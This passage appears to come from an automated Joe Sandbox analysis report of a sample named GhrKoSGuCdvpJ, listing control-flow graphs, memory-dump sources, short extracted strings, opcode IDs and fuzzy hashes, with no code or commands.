                                          control_flow_graph 2662 56b5968-56b5969 2663 56b596c-56b596e 2662->2663 2664 56b5971 2662->2664 2665 56b5970 2663->2665 2666 56b5975-56b5998 2663->2666 2664->2666 2665->2664 2667 56b599a 2666->2667 2668 56b599f-56b5a7c call 56b41a0 call 56b3cc0 2666->2668 2667->2668 2678 56b5a7e 2668->2678 2679 56b5a83-56b5aa1 2668->2679 2678->2679 2709 56b5aa4 call 56b5fc9 2679->2709 2710 56b5aa4 call 56b5fcd 2679->2710 2711 56b5aa4 call 56b6041 2679->2711 2712 56b5aa4 call 56b5fd1 2679->2712 2713 56b5aa4 call 56b6050 2679->2713 2714 56b5aa4 call 56b5ff0 2679->2714 2715 56b5aa4 call 56b5fd5 2679->2715 2680 56b5aaa-56b5ab5 2681 56b5abc-56b5ac0 2680->2681 2682 56b5ab7 2680->2682 2683 56b5ac2-56b5ac3 2681->2683 2684 56b5ac5-56b5acc 2681->2684 2682->2681 2685 56b5ae4-56b5b28 2683->2685 2686 56b5ace 2684->2686 2687 56b5ad3-56b5ae1 2684->2687 2691 56b5b8e-56b5ba5 2685->2691 2686->2687 2687->2685 2693 56b5b2a-56b5b40 2691->2693 2694 56b5ba7-56b5bcc 2691->2694 2698 56b5b6a 2693->2698 2699 56b5b42-56b5b4e 2693->2699 2700 56b5bce-56b5be3 2694->2700 2701 56b5be4 2694->2701 2704 56b5b70-56b5b8d 2698->2704 2702 56b5b58-56b5b5e 2699->2702 2703 56b5b50-56b5b56 2699->2703 2700->2701 2705 56b5b68 2702->2705 2703->2705 2704->2691 2705->2704 2709->2680 2710->2680 2711->2680 2712->2680 2713->2680 2714->2680 2715->2680
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 0317c04ac1832a323442da8b8eb7a5a6e7dee33c444865409201c598b24885fb
                                          • Instruction ID: a7ba4dd4685a44e251b5f7d92c9aaf572099810ae6e40cd95049222a28b637cf
                                          • Opcode Fuzzy Hash: 0317c04ac1832a323442da8b8eb7a5a6e7dee33c444865409201c598b24885fb
                                          • Instruction Fuzzy Hash: 39819274E00218CFEB54DFA9D994ADDBBF2BF89300F14806AE419AB365EB745981CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: c781046f55ffc4827451b4ef0e451fd99ab30f8de46db124a9a138084ecb4e62
                                          • Instruction ID: b95047cd9d70c87dc81cf958e08cc94d4deebfec9091eb5f5f83c69e9afd980d
                                          • Opcode Fuzzy Hash: c781046f55ffc4827451b4ef0e451fd99ab30f8de46db124a9a138084ecb4e62
                                          • Instruction Fuzzy Hash: DA818074E002189FEB14DFAAD944B9DBBB2BF89300F14C06AE419AB365DB749981CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: f6cc0b645d40855f345b1ed5642c1bc73a5cfb07e266fe00b13055f1949fb24c
                                          • Instruction ID: 847a6cf96599e6da0a58d48e0a033ce71aa5eca1362fb54e3cec9322f766dcfd
                                          • Opcode Fuzzy Hash: f6cc0b645d40855f345b1ed5642c1bc73a5cfb07e266fe00b13055f1949fb24c
                                          • Instruction Fuzzy Hash: D8819074E01218CFEB14CFAAD944BDDBBB2BF88300F14806AE419AB365DB749981CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 5c2644a5b3f927b159d2734940351de0e63b28de9348406c956e00c5a1c16618
                                          • Instruction ID: 43cef013b349741e5fdf8d190f809cdd056247810b8b84a6a1bf27f8c9de0d92
                                          • Opcode Fuzzy Hash: 5c2644a5b3f927b159d2734940351de0e63b28de9348406c956e00c5a1c16618
                                          • Instruction Fuzzy Hash: 8D819274E00218CFEB14CFAAD884B9DBBF2BF89310F14816AD419AB365DB749985CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 6963dca576d195643bc047b328b8e00f7b5d57d4037952385adefaf53c8a3acf
                                          • Instruction ID: 29feb6565520213dec7498eaa96e7aab850779e7012f755d94fb4bc14fad3c8c
                                          • Opcode Fuzzy Hash: 6963dca576d195643bc047b328b8e00f7b5d57d4037952385adefaf53c8a3acf
                                          • Instruction Fuzzy Hash: 5A819474E00219CFEB14DFAAD944A9DBBF2BF89300F14C06AE819AB365DB745981CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: deb89c2e0de942ca5ff6ad6b35d56bc5633298183e13d05f7f87027413f7ce61
                                          • Instruction ID: cf7e57b01982f8528e1cfafd9d37012a32863142c52ec737be5bd5a609db351c
                                          • Opcode Fuzzy Hash: deb89c2e0de942ca5ff6ad6b35d56bc5633298183e13d05f7f87027413f7ce61
                                          • Instruction Fuzzy Hash: 1A61C674E002198FEB54DFAAD844A9DBBF2BF89310F14C06AE819AB365DB745981CF50
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3746610010.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_7030000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a64816309f301b919f10e79850b922461db00514dec1a54a6a4a6d91e75de998
                                          • Instruction ID: eb7d6eedd82ce9526b339b1d72ce8734b85e237bbbc5eee48be0ae515022ae6b
                                          • Opcode Fuzzy Hash: a64816309f301b919f10e79850b922461db00514dec1a54a6a4a6d91e75de998
                                          • Instruction Fuzzy Hash: D5F116B4E10218CFDB14CFA9D884B9DFBB6BF84304F1482AAD448AB355DB74A985CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: u
                                          • API String ID: 0-4067256894
                                          • Opcode ID: 7086336939ae69c4052b03938cfb3a15366d71cee3d3ba8abfdad4f49ce59ace
                                          • Instruction ID: 63f5c89dfebd7c2dd0804daa1235f0e1f5f85c3ceea1ee2dea0c1b13116c1930
                                          • Opcode Fuzzy Hash: 7086336939ae69c4052b03938cfb3a15366d71cee3d3ba8abfdad4f49ce59ace
                                          • Instruction Fuzzy Hash: D0510774E01218DBEB14DFA9D8487EDF7B2FB89300F648129D405BB2A4D7B59981CF54
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd47bf713c2ef2874ae0ba720fb0bc1cfb3ee244515e50e0749159a2790f932d
                                          • Instruction ID: 635187f81c2319b715a9241b302ff5afffd776b5dfb71dec619e5f3b2ce2f0ac
                                          • Opcode Fuzzy Hash: fd47bf713c2ef2874ae0ba720fb0bc1cfb3ee244515e50e0749159a2790f932d
                                          • Instruction Fuzzy Hash: 32519674E00218DFEB18DFAAD454A9DBBB2FF89300F24812AE815AB764DB759845CF50
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55093f943e403024f7a1144cac734c552423d91995582d742d599c965a4c5881
                                          • Instruction ID: 2636a4acd8ad143fce692f24bddd260f0b984c34a279e59d5dda7c88230f364a
                                          • Opcode Fuzzy Hash: 55093f943e403024f7a1144cac734c552423d91995582d742d599c965a4c5881
                                          • Instruction Fuzzy Hash: 9C510474E05218CFEB14DFA8D888BEDF7B2FB49305F608229D415AB2A4C7B59981CF54
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a76f739d5989a0355702e99f85c16d1378a028e47a9ae3c338026eaf8b017fcf
                                          • Instruction ID: 757870369181698b4cb3e3d2240a03c229e7c8d977ec32c92a852e2b0060443c
                                          • Opcode Fuzzy Hash: a76f739d5989a0355702e99f85c16d1378a028e47a9ae3c338026eaf8b017fcf
                                          • Instruction Fuzzy Hash: 1651A674E00218DFEB18DFA6D844ADDBBB2FF89300F24812AE815AB765DB759845CF00

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 109 56b86ae-56b86b5 110 56b8728-56b8731 109->110 111 56b86b7-56b86bf 109->111 218 56b8733 call 56b8ac1 110->218 219 56b8733 call 56b8ad0 110->219 114 56b86c6-56b86cc 111->114 113 56b8739-56b8749 115 56b874f-56b8752 113->115 116 56b893e-56b8942 113->116 114->116 117 56b86d2-56b86e1 114->117 120 56b875c-56b875f 115->120 121 56b8754-56b875a 115->121 118 56b8948-56b894e 116->118 119 56b8a67 116->119 123 56b878f-56b87ba call 56b8338 * 2 117->123 124 56b86e7 117->124 125 56b8667-56b8670 118->125 126 56b8954-56b8958 118->126 129 56b8a6c-56b8a80 119->129 120->119 122 56b8765-56b8768 120->122 121->120 121->122 127 56b876a-56b876e 122->127 128 56b8770-56b8773 122->128 159 56b87c0-56b87c4 123->159 160 56b88a4-56b88be 123->160 131 56b86ea-56b86fb 124->131 132 56b867f-56b868b 125->132 133 56b8672-56b8677 125->133 134 56b895a-56b896e 126->134 135 56b8971-56b897f 126->135 127->128 136 56b8779-56b877d 127->136 128->119 128->136 131->129 138 56b8701-56b8713 131->138 132->129 139 56b8691-56b8697 132->139 133->132 147 56b8981-56b8996 135->147 148 56b89f0-56b8a05 135->148 136->119 141 56b8783-56b8789 136->141 138->129 144 56b8719-56b8725 138->144 139->116 145 56b869d-56b86ad 139->145 141->123 141->131 144->110 145->109 154 56b86c1-56b86c3 145->154 155 56b8998-56b899b 147->155 156 56b899d-56b89aa 147->156 157 56b8a0c-56b8a19 148->157 158 56b8a07-56b8a0a 148->158 154->114 161 56b89ac-56b89ed 155->161 156->161 162 56b8a1b-56b8a56 157->162 158->162 159->116 163 56b87ca-56b87ce 159->163 160->126 179 56b88c4-56b88c8 160->179 178 56b8a5d-56b8a64 162->178 167 56b87d0-56b87dd 163->167 168 56b87f6-56b87fc 163->168 180 56b87df-56b87ea 167->180 181 56b87ec 167->181 169 56b87fe-56b8802 168->169 170 56b8837-56b883d 168->170 169->170 174 56b8804-56b880d 169->174 175 56b8849-56b884f 170->175 176 56b883f-56b8843 170->176 184 56b880f-56b8814 174->184 185 56b881c-56b8832 174->185 182 56b885b-56b885d 175->182 183 56b8851-56b8855 175->183 176->175 176->178 188 56b88ca-56b88d4 call 56b6dd8 179->188 189 56b8904-56b8908 179->189 192 56b87ee-56b87f0 180->192 181->192 190 56b885f-56b8868 182->190 191 56b8892-56b8894 182->191 183->116 183->182 184->185 185->116 188->189 206 56b88d6-56b88eb 188->206 189->178 201 56b890e-56b8912 189->201 195 56b886a-56b886f 190->195 196 56b8877-56b888d 190->196 191->116 197 56b889a-56b88a1 191->197 192->116 192->168 195->196 196->116 201->178 202 56b8918-56b8925 201->202 209 56b8927-56b8932 202->209 210 56b8934 202->210 206->189 215 56b88ed-56b8902 206->215 212 56b8936-56b8938 209->212 210->212 212->116 212->178 215->126 215->189 218->113 219->113
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$(oq$(oq$,q$,q
                                          • API String ID: 0-189141485
                                          • Opcode ID: 9e2ef6570f05ed25e97b44fda58c535da2bf05b759b8635068cd44c03b57a0b1
                                          • Instruction ID: eed10704f2a455163418d1eb4c08a1c9bf072f0238f43e00929456a84d6684fb
                                          • Opcode Fuzzy Hash: 9e2ef6570f05ed25e97b44fda58c535da2bf05b759b8635068cd44c03b57a0b1
                                          • Instruction Fuzzy Hash: 86D15C71A00208DFEB25DF68C484AEDBBF6BF48314F148569E45AAB761DB70ED81CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1791 56b8e88-56b9376 1867 56b98c8-56b98e0 1791->1867 1868 56b937c-56b938c 1791->1868 1872 56b9939-56b9941 1867->1872 1873 56b98e2 1867->1873 1868->1867 1869 56b9392-56b93a2 1868->1869 1869->1867 1871 56b93a8-56b93b8 1869->1871 1871->1867 1874 56b93be-56b93ce 1871->1874 1882 56b9943-56b994e 1872->1882 1883 56b9966-56b9969 1872->1883 1875 56b98e9-56b98ea 1873->1875 1876 56b98e4-56b98e8 1873->1876 1874->1867 1877 56b93d4-56b93e4 1874->1877 1879 56b98ec-56b98ef 1875->1879 1880 56b98f1-56b98fd 1875->1880 1876->1875 1877->1867 1881 56b93ea-56b93fa 1877->1881 1879->1880 1885 56b9909-56b9927 1880->1885 1886 56b98ff-56b9904 1880->1886 1881->1867 1884 56b9400-56b9410 1881->1884 1882->1883 1896 56b9950-56b995a 1882->1896 1887 56b996b-56b9977 1883->1887 1888 56b9980-56b998c 1883->1888 1884->1867 1889 56b9416-56b9426 1884->1889 1912 56b9929-56b9933 1885->1912 1913 56b999e-56b99aa 1885->1913 1890 56b99ee-56b99f3 1886->1890 1887->1888 1902 56b9979-56b997e 1887->1902 1893 56b998e-56b9995 1888->1893 1894 56b99f4-56b9a00 1888->1894 1889->1867 1895 56b942c-56b943c 1889->1895 1893->1894 1898 56b9997-56b999c 1893->1898 1904 56b9a5a 1894->1904 1905 56b9a02 1894->1905 1895->1867 1899 56b9442-56b9452 1895->1899 1896->1883 1911 56b995c-56b9961 1896->1911 1898->1890 1899->1867 1900 56b9458-56b98c7 1899->1900 1902->1890 1909 56b9a09-56b9a0a 1905->1909 1910 56b9a04-56b9a08 1905->1910 1916 56b9a0c-56b9a0e 1909->1916 1917 56b9a11-56b9a16 1909->1917 1914 56b9a0a 1910->1914 1915 56b9a62 1910->1915 1911->1890 1912->1913 1927 56b9935-56b9937 1912->1927 1929 56b99ac-56b99b8 1913->1929 1930 56b99c1-56b99cd 1913->1930 1914->1916 1914->1917 1919 56b9a10 1916->1919 1920 56b9a15 1916->1920 1921 56b9a18 1917->1921 1922 56b9a26 1917->1922 1919->1917 1920->1915 1921->1922 1925 56b9a1f-56b9a24 1921->1925 1926 56b9a28-56b9a29 1922->1926 1925->1926 1927->1872 1929->1930 1936 56b99ba-56b99bf 1929->1936 1934 56b99cf-56b99db 1930->1934 1935 56b99e4-56b99e6 1930->1935 1934->1935 1939 56b99dd-56b99e2 1934->1939 1935->1890 1936->1890 1939->1890
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'q$4'q
                                          • API String ID: 0-1467158625
                                          • Opcode ID: 36ff234042b88216cbc6350bef7e5d0e7ca3a0117670ecaa34f7b487d3aa1c5b
                                          • Instruction ID: f68aa18ca65bc772096f314807d41ee04af7b5a5892e1f05242c6d9a43bf532f
                                          • Opcode Fuzzy Hash: 36ff234042b88216cbc6350bef7e5d0e7ca3a0117670ecaa34f7b487d3aa1c5b
                                          • Instruction Fuzzy Hash: 4E524E74A00318CFEB259FA4C860B9EBB72FF95300F1080AEC64A6B764DA759D85DF51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2366 56b6930-56b6952 2367 56b6968-56b6973 2366->2367 2368 56b6954-56b6958 2366->2368 2371 56b6a1b-56b6a47 2367->2371 2372 56b6979-56b697b 2367->2372 2369 56b695a-56b6966 2368->2369 2370 56b6980-56b6987 2368->2370 2369->2367 2369->2370 2374 56b6989-56b6990 2370->2374 2375 56b69a7-56b69b0 2370->2375 2378 56b6a4e-56b6a8a 2371->2378 2373 56b6a13-56b6a18 2372->2373 2374->2375 2376 56b6992-56b699d 2374->2376 2479 56b69b2 call 56b6920 2375->2479 2480 56b69b2 call 56b6930 2375->2480 2376->2378 2379 56b69a3-56b69a5 2376->2379 2398 56b6a8c-56b6a90 2378->2398 2399 56b6a91-56b6a92 2378->2399 2379->2373 2380 56b69b8-56b69ba 2381 56b69bc-56b69c0 2380->2381 2382 56b69c2-56b69ca 2380->2382 2381->2382 2384 56b69dd-56b69fc call 56b77a0 2381->2384 2385 56b69d9-56b69db 2382->2385 2386 56b69cc-56b69d1 2382->2386 2392 56b69fe-56b6a07 2384->2392 2393 56b6a11 2384->2393 2385->2373 2386->2385 2475 56b6a09 call 56bb99d 2392->2475 2476 56b6a09 call 56bb8e3 2392->2476 2393->2373 2395 56b6a0f 2395->2373 2398->2399 2400 56b6a99-56b6aa6 2399->2400 2401 56b6a94-56b6a95 2399->2401 2402 56b6aa8-56b6aae 2400->2402 2403 56b6ab5-56b6ac7 2400->2403 2401->2400 2402->2403 2405 56b6b5b-56b6b5d 2403->2405 2406 56b6acd-56b6ad1 2403->2406 2477 56b6b5f call 56b6ce8 2405->2477 2478 56b6b5f call 56b6cf8 2405->2478 2407 56b6ad3-56b6adf 2406->2407 2408 56b6ae1-56b6aee 2406->2408 2414 56b6af0-56b6afa 2407->2414 2408->2414 2409 56b6b65-56b6b6b 2411 56b6b6d-56b6b73 2409->2411 2412 56b6b77-56b6b7e 2409->2412 2415 56b6bd9-56b6c38 2411->2415 2416 56b6b75 2411->2416 2419 56b6afc-56b6b0b 2414->2419 2420 56b6b27-56b6b2b 2414->2420 2428 56b6c3f-56b6c4a 2415->2428 2416->2412 2431 56b6b1b-56b6b25 2419->2431 2432 56b6b0d-56b6b14 2419->2432 2422 56b6b2d-56b6b33 2420->2422 2423 56b6b37-56b6b3b 2420->2423 2426 56b6b81-56b6bd2 2422->2426 2427 56b6b35 2422->2427 2423->2412 2424 56b6b3d-56b6b41 2423->2424 2424->2428 2429 56b6b47-56b6b59 2424->2429 2426->2415 2427->2412 2439 56b6c4c-56b6c50 2428->2439 2440 56b6c51-56b6c52 2428->2440 2429->2412 2431->2420 2432->2431 2439->2440 2441 56b6c59-56b6c63 2440->2441 2442 56b6c54 2440->2442 2446 56b6c69-56b6c6b 2441->2446 2447 56b6c65-56b6c67 2441->2447 2442->2441 2448 56b6c6d-56b6c71 2446->2448 2449 56b6c7c-56b6c7e 2446->2449 2451 56b6ce1-56b6ce4 2447->2451 2453 56b6c73-56b6c75 2448->2453 2454 56b6c77-56b6c7a 2448->2454 2455 56b6c91-56b6c97 2449->2455 2456 56b6c80-56b6c84 2449->2456 2453->2451 2454->2451 2457 56b6c99-56b6cc0 2455->2457 2458 56b6cc2-56b6cc4 2455->2458 2460 56b6c8a-56b6c8f 2456->2460 2461 56b6c86-56b6c88 2456->2461 2464 56b6ccb-56b6ccd 2457->2464 2458->2464 2460->2451 2461->2451 2467 56b6ccf-56b6cd1 2464->2467 2468 56b6cd3-56b6cd5 2464->2468 2467->2451 2470 56b6cde 2468->2470 2471 56b6cd7-56b6cdc 2468->2471 2470->2451 2471->2451 2475->2395 2476->2395 2477->2409 2478->2409 2479->2380 2480->2380
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hq$Hq
                                          • API String ID: 0-925789375
                                          • Opcode ID: 14591d210fa60d05beb1f793c7456e6c807203030dc7fa8f54cc8d614f1f6b16
                                          • Instruction ID: 6858f322c636d8a483cbc035027093ec0adb6d6b5cf45f877d85e82ac67571c9
                                          • Opcode Fuzzy Hash: 14591d210fa60d05beb1f793c7456e6c807203030dc7fa8f54cc8d614f1f6b16
                                          • Instruction Fuzzy Hash: F8B1BB707042118FEB259F28C854BBA7BB2FB89310F188569E946CB791DFB5CC82D791

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2482 56b6e90-56b6e9d 2483 56b6e9f-56b6ea3 2482->2483 2484 56b6ea5-56b6ea7 2482->2484 2483->2484 2485 56b6eac-56b6eb7 2483->2485 2486 56b70b8-56b70bf 2484->2486 2487 56b6ebd-56b6ec4 2485->2487 2488 56b70c0 2485->2488 2489 56b6eca-56b6ed9 2487->2489 2490 56b7059-56b705f 2487->2490 2492 56b70c5-56b70fd 2488->2492 2491 56b6edf-56b6eee 2489->2491 2489->2492 2493 56b7061-56b7063 2490->2493 2494 56b7065-56b7069 2490->2494 2500 56b6f03-56b6f06 2491->2500 2501 56b6ef0-56b6ef3 2491->2501 2507 56b70ff-56b7104 2492->2507 2508 56b7106-56b710a 2492->2508 2493->2486 2495 56b706b-56b7071 2494->2495 2496 56b70b6 2494->2496 2495->2488 2498 56b7073-56b7076 2495->2498 2496->2486 2498->2488 2502 56b7078-56b708d 2498->2502 2504 56b6f12-56b6f18 2500->2504 2506 56b6f08-56b6f0b 2500->2506 2501->2504 2505 56b6ef5-56b6ef8 2501->2505 2522 56b708f-56b7095 2502->2522 2523 56b70b1-56b70b4 2502->2523 2515 56b6f1a-56b6f20 2504->2515 2516 56b6f30-56b6f4d 2504->2516 2509 56b6ff9-56b6fff 2505->2509 2510 56b6efe 2505->2510 2511 56b6f5e-56b6f64 2506->2511 2512 56b6f0d 2506->2512 2514 56b7110-56b7112 2507->2514 2508->2514 2517 56b7001-56b7007 2509->2517 2518 56b7017-56b7021 2509->2518 2519 56b7024-56b7031 2510->2519 2520 56b6f7c-56b6f8e 2511->2520 2521 56b6f66-56b6f6c 2511->2521 2512->2519 2524 56b7127-56b712e 2514->2524 2525 56b7114-56b7126 2514->2525 2526 56b6f22 2515->2526 2527 56b6f24-56b6f2e 2515->2527 2555 56b6f56-56b6f59 2516->2555 2528 56b700b-56b7015 2517->2528 2529 56b7009 2517->2529 2518->2519 2546 56b7033-56b7037 2519->2546 2547 56b7045-56b7047 2519->2547 2541 56b6f9e-56b6fc1 2520->2541 2542 56b6f90-56b6f9c 2520->2542 2531 56b6f6e 2521->2531 2532 56b6f70-56b6f7a 2521->2532 2533 56b70a7-56b70aa 2522->2533 2534 56b7097-56b70a5 2522->2534 2523->2486 2526->2516 2527->2516 2528->2518 2529->2518 2531->2520 2532->2520 2533->2488 2537 56b70ac-56b70af 2533->2537 2534->2488 2534->2533 2537->2522 2537->2523 2541->2488 2559 56b6fc7-56b6fca 2541->2559 2556 56b6fe9-56b6ff7 2542->2556 2546->2547 2550 56b7039-56b703d 2546->2550 2549 56b704b-56b704e 2547->2549 2549->2488 2552 56b7050-56b7053 2549->2552 2550->2488 2551 56b7043 2550->2551 2551->2549 2552->2489 2552->2490 2555->2519 2556->2519 2559->2488 2560 56b6fd0-56b6fe2 2559->2560 2560->2556
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,q$,q
                                          • API String ID: 0-1667412543
                                          • Opcode ID: 66f455b89fd182fb3a77e69ac9a2d7f4124218e7d183b1db2571b9cf8384b8df
                                          • Instruction ID: 2e0b62d7aef4057f49e023836aed57872e3aae32ba62397cac5000d5ada75c50
                                          • Opcode Fuzzy Hash: 66f455b89fd182fb3a77e69ac9a2d7f4124218e7d183b1db2571b9cf8384b8df
                                          • Instruction Fuzzy Hash: B8819F74B04505CFEB14CF69C884AAEB7B2FFC9205B1481AAD406E7760DB71EC81CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$Xq
                                          • API String ID: 0-1556399337
                                          • Opcode ID: 4231116365324c77c1c5ead5e371a6f2fa02d65940a852e44571cca75abdf893
                                          • Instruction ID: 838649aed81acd5ae6580a67a41e71fd90a1acfa91e4f2d5292a6d8371aa28bc
                                          • Opcode Fuzzy Hash: 4231116365324c77c1c5ead5e371a6f2fa02d65940a852e44571cca75abdf893
                                          • Instruction Fuzzy Hash: 82319231B0432587FF284AA999953BEA5ABBBC4211F584839D807C7790DBF5CC85C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $q$$q
                                          • API String ID: 0-3126353813
                                          • Opcode ID: bc36c2956a6e26cc0e1db69fa282096a7d573ac886cbcbfa18e05dfa23060925
                                          • Instruction ID: f9ec548affe0c110b6c6838d28f9e4fa1d300ec76ee58759bd3c07a22ae6ce7e
                                          • Opcode Fuzzy Hash: bc36c2956a6e26cc0e1db69fa282096a7d573ac886cbcbfa18e05dfa23060925
                                          • Instruction Fuzzy Hash: 5F31F0703082518FEB69EB68C891ABD7B66BF8170071C445AE292DBB92DEA1CCC0C751
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LRq
                                          • API String ID: 0-3187445251
                                          • Opcode ID: 12993964b9b4e73d41328da07f2c7db68f6f9479fca7bf1f45e1e919af05ce02
                                          • Instruction ID: d12172a4a4c875d6a34cda7fbc043ca781e14efffc6b379fc2154a5c3cae2578
                                          • Opcode Fuzzy Hash: 12993964b9b4e73d41328da07f2c7db68f6f9479fca7bf1f45e1e919af05ce02
                                          • Instruction Fuzzy Hash: 3652CA74A10219CFCB54DF28ED98B9DBBB2FB89302F1081A5D80AA7354DB745E81CF95
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LRq
                                          • API String ID: 0-3187445251
                                          • Opcode ID: a82d94e2db01e1ffd670a6b4d34e39d908301040d64afb2f0183de8554840f50
